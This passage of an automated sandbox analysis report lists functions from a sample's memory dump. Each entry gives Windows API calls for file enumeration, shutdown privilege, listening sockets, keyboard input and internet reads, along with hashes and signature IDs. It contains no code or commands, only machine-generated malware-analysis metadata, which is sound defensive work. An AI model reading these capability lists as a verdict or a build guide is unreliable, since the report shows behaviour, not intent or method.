                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$@U=u
                                        • API String ID: 973565025-2104563098
                                        • Opcode ID: 5e0ab06a0b0e44988384438671eb1efbad4a1e9916a192f6433f98e8474eb5fe
                                        • Instruction ID: 99a5553c057c29192b62ebb5b3aa7253e23133b512866d4e45ef90391baf6eb5
                                        • Opcode Fuzzy Hash: 5e0ab06a0b0e44988384438671eb1efbad4a1e9916a192f6433f98e8474eb5fe
                                        • Instruction Fuzzy Hash: 4751AD31604344AFD716EF24DC96FAA7BE9FB88700F404A2DF5869B2E1DB709904CB52
                                        Function 003724A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003724F6
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00372526
                                        • _wcscmp.LIBCMT ref: 0037253A
                                        • _wcscmp.LIBCMT ref: 00372555
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003725F3
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00372609
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                        • String ID: *.*
                                        • API String ID: 713712311-438819550
                                        • Opcode ID: 2da887d27cb4dfd5b49d5433dfa3532642417badcd3b1b2d7a360c223a708a25
                                        • Instruction ID: 86a01c958be35f5d4e080e5267b434deafa50f6c6c422e9f0207b5962e9f4738
                                        • Opcode Fuzzy Hash: 2da887d27cb4dfd5b49d5433dfa3532642417badcd3b1b2d7a360c223a708a25
                                        • Instruction Fuzzy Hash: 10416F7190021AAFCF26DFA4DC55AEFBBB8FF06310F104456E419AA191E7749B84CB90
                                        Function 00328530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 7181a145067972f235a1300dc5cad1d812818288df9fbf399eff3a769c029ebe
                                        • Instruction ID: 8d3e30ac73300fc866b98376d07500ecdb6b7d609a5b278226864a8ce4de2ce3
                                        • Opcode Fuzzy Hash: 7181a145067972f235a1300dc5cad1d812818288df9fbf399eff3a769c029ebe
                                        • Instruction Fuzzy Hash: 5F12A270A01619EFDF06DFA8E981AAEB3F5FF48300F204569E406EB250EB35AD51CB50
                                        Function 003682D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0035BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0035BF0F
                                          • Part of subcall function 0035BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0035BF3C
                                          • Part of subcall function 0035BEC3: GetLastError.KERNEL32 ref: 0035BF49
                                        • ExitWindowsEx.USER32(?,00000000), ref: 0036830C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-194228
                                        • Opcode ID: 2eb3ba43bc5c2a13605c65bf4e08673e6a2d0d7b88ba4f282fb9dc31a691e4c2
                                        • Instruction ID: fad8c7006cf39ac34440aa5ac3b649250a57980af3571ba16deabd73a1645bdb
                                        • Opcode Fuzzy Hash: 2eb3ba43bc5c2a13605c65bf4e08673e6a2d0d7b88ba4f282fb9dc31a691e4c2
                                        • Instruction Fuzzy Hash: 7701F77DA40311ABE76B17788C4BFBB765C9B09B80F398A24F943E52D5DE609C0082A4
                                        Function 003791DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00379235
                                        • WSAGetLastError.WS2_32(00000000), ref: 00379244
                                        • bind.WS2_32(00000000,?,00000010), ref: 00379260
                                        • listen.WS2_32(00000000,00000005), ref: 0037926F
                                        • WSAGetLastError.WS2_32(00000000), ref: 00379289
                                        • closesocket.WS2_32(00000000), ref: 0037929D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                        • String ID:
                                        • API String ID: 1279440585-0
                                        • Opcode ID: f7c009a1be7db86e87ccfb9d2ea76aadd2c38c7626d3c63580822f3e3cb7dcb6
                                        • Instruction ID: b34416110f69edf41f5620d16318001183232655829fde994d85dda25062eaeb
                                        • Opcode Fuzzy Hash: f7c009a1be7db86e87ccfb9d2ea76aadd2c38c7626d3c63580822f3e3cb7dcb6
                                        • Instruction Fuzzy Hash: 1421E131600604AFCB16FF64CC85B6EB7ACEF49320F118659F95AAB392CB34AD41CB51
                                        Function 00326670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: hN=$tM=
                                        • API String ID: 4104443479-683757419
                                        • Opcode ID: e3a68f220096e92c97c2e4e051bd0305f795bdfceaf25e49cb1fff0bddf00461
                                        • Instruction ID: fa70e5300ac5714d84da21c3117f01bc5bbfde49ebc90b7c722aa216531bddc0
                                        • Opcode Fuzzy Hash: e3a68f220096e92c97c2e4e051bd0305f795bdfceaf25e49cb1fff0bddf00461
                                        • Instruction Fuzzy Hash: 2BA27E75D00229CFCB26CF58D4816ADBBB5FF49314F2681AAE859AB390D7349D81CF90
                                        Function 0032A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0034010A: std::exception::exception.LIBCMT ref: 0034013E
                                          • Part of subcall function 0034010A: __CxxThrowException@8.LIBCMT ref: 00340153
                                        • _memmove.LIBCMT ref: 00393020
                                        • _memmove.LIBCMT ref: 00393135
                                        • _memmove.LIBCMT ref: 003931DC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                        • String ID:
                                        • API String ID: 1300846289-0
                                        • Opcode ID: 5ff8258a5047a82be8774a68506e2bd1d9dfa7834aa6c9c0a7ea4a655c483232
                                        • Instruction ID: 27b94f1d91c9f2993a34e8d07fd3169c627925478e1c8deefdd0ce2f5a02dc1e
                                        • Opcode Fuzzy Hash: 5ff8258a5047a82be8774a68506e2bd1d9dfa7834aa6c9c0a7ea4a655c483232
                                        • Instruction Fuzzy Hash: 6102A0B0A00215DFCF06DF68D981AAEB7F9EF48300F158469E806DF255EB35DA51CB91
                                        Function 003796E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0037ACD3: inet_addr.WS2_32(00000000), ref: 0037ACF5
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0037973D
                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 00379760
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLastinet_addrsocket
                                        • String ID:
                                        • API String ID: 4170576061-0
                                        • Opcode ID: feef7d94336cf44679aca72b6ece612d834db0ce979b3470b928558d629178aa
                                        • Instruction ID: 751d2badbf46adf795f7153fe6be55ac647e96691fc61d9d62cecad3a3d1f303
                                        • Opcode Fuzzy Hash: feef7d94336cf44679aca72b6ece612d834db0ce979b3470b928558d629178aa
                                        • Instruction Fuzzy Hash: FE41E571600210AFDB16AF28CC82E7E77EDEF45324F148149F956AF392CB749E018B91
                                        Function 0036F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 0036F37A
                                        • _wcscmp.LIBCMT ref: 0036F3AA
                                        • _wcscmp.LIBCMT ref: 0036F3BF
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0036F3D0
                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0036F3FE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                        • String ID:
                                        • API String ID: 2387731787-0
                                        • Opcode ID: 6e02e83ebde1baebee48975f3bf5379998bbca04eace826b760e0b691187739b
                                        • Instruction ID: 143e10434638da0be93ec725739571b0408c2c5bd9c372f8ca6a78964c6f390d
                                        • Opcode Fuzzy Hash: 6e02e83ebde1baebee48975f3bf5379998bbca04eace826b760e0b691187739b
                                        • Instruction Fuzzy Hash: 1D41AC356007019FC70ADF29D490A9AB3E8FF49324F10852EE95A8B7A1DB71B941CB91
                                        Function 00364342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0036439C
                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 003643B8
                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00364425
                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00364483
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 4d1fb2997a107361445b6b29637d1df188814dfd6b01c4c8e40b05028d862fd2
                                        • Instruction ID: f4b23d833dee91410ef18978290f269792e618afdaa8833d44c4ace69ab7243b
                                        • Opcode Fuzzy Hash: 4d1fb2997a107361445b6b29637d1df188814dfd6b01c4c8e40b05028d862fd2
                                        • Instruction Fuzzy Hash: 264137B0E00248AEEF238B66D80A7FE7BB9AF45311F04811AF481976C9CB748984C765
                                        Function 0038EFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • GetCursorPos.USER32(?), ref: 0038EFE2
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0039F3C3,?,?,?,?,?), ref: 0038EFF7
                                        • GetCursorPos.USER32(?), ref: 0038F041
                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0039F3C3,?,?,?), ref: 0038F077
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                        • String ID:
                                        • API String ID: 1423138444-0
                                        • Opcode ID: b1f43203d6147f680b34a9e5012108acb7ec42f598eb6fe5df31140ebe34df10
                                        • Instruction ID: 8e5940b4aad7d80f0d9c0e58154398c8118adc01dc5ac986556c4373b6b34f2b
                                        • Opcode Fuzzy Hash: b1f43203d6147f680b34a9e5012108acb7ec42f598eb6fe5df31140ebe34df10
                                        • Instruction Fuzzy Hash: 7F21F335600218EFCB279F54C898EEA7BB9FF4A750F0441A9F9054B2A2C7359D51DB90
                                        Function 0038F0A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46nativewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0039F352,?,?,?), ref: 0038F115
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0038F0FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                        • String ID: @U=u
                                        • API String ID: 1273190321-2594219639
                                        • Opcode ID: f9b140a9f65695086c1e8431de51f2e134964cd2381a76a5f5afa2407e8fac06
                                        • Instruction ID: 4c2bd5a6ae192f7cdf375e5f16b85daa7af6bed5b1c9047c790ac24f8e80fa3d
                                        • Opcode Fuzzy Hash: f9b140a9f65695086c1e8431de51f2e134964cd2381a76a5f5afa2407e8fac06
                                        • Instruction Fuzzy Hash: 8701B131200214EFCB23BF15DC89F6A7BAAFB86364F140264F9564F2E1C7719842DB50
                                        Function 0036220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0036221E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($|
                                        • API String ID: 1659193697-1631851259
                                        • Opcode ID: 2bebf86d249433bd270e9940a78cf1b79889f7e278a95aa877079475d4ddddf5
                                        • Instruction ID: 8198969ad4be646a39e39572b3ee19c7cd68d61938631de093e125f32935d4a8
                                        • Opcode Fuzzy Hash: 2bebf86d249433bd270e9940a78cf1b79889f7e278a95aa877079475d4ddddf5
                                        • Instruction Fuzzy Hash: 49323575A00A059FC729CF69C490A6AF7F0FF48320B12C46EE59ADB7A5E770E941CB44
                                        Function 0033AD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0033AE5E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: a207474cfff3531cee190f535111b6de766ebe0a3fd765d9d802a81d6e23e6bb
                                        • Instruction ID: 0002f8a21384f6013ac689823e06404a55d87b3001a65c11439d519bfbe2a03c
                                        • Opcode Fuzzy Hash: a207474cfff3531cee190f535111b6de766ebe0a3fd765d9d802a81d6e23e6bb
                                        • Instruction Fuzzy Hash: 0DA11A78104A05BEDF3BAB294CD8D7F395CDB42742F114629F482DA5A1CA299C01A373
                                        Function 0037550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00374A1E,00000000), ref: 003755FD
                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00375629
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Internet$AvailableDataFileQueryRead
                                        • String ID:
                                        • API String ID: 599397726-0
                                        • Opcode ID: 3e686e28087ec18c15c2e1d9136473398823aa9d261890cb599f4ac38f629534
                                        • Instruction ID: 94677b56c7b54ad5a745e96cdbdd7037c2ebf98a4ae79b7ea87b2509dd60b368
                                        • Opcode Fuzzy Hash: 3e686e28087ec18c15c2e1d9136473398823aa9d261890cb599f4ac38f629534
                                        • Instruction Fuzzy Hash: 6341EA71500609BFEB3A9E91CC85EBFB7FDEB41724F10801AF60A6A140DBB5AE419A54
                                        Function 0036EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0036EA95
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0036EAEF
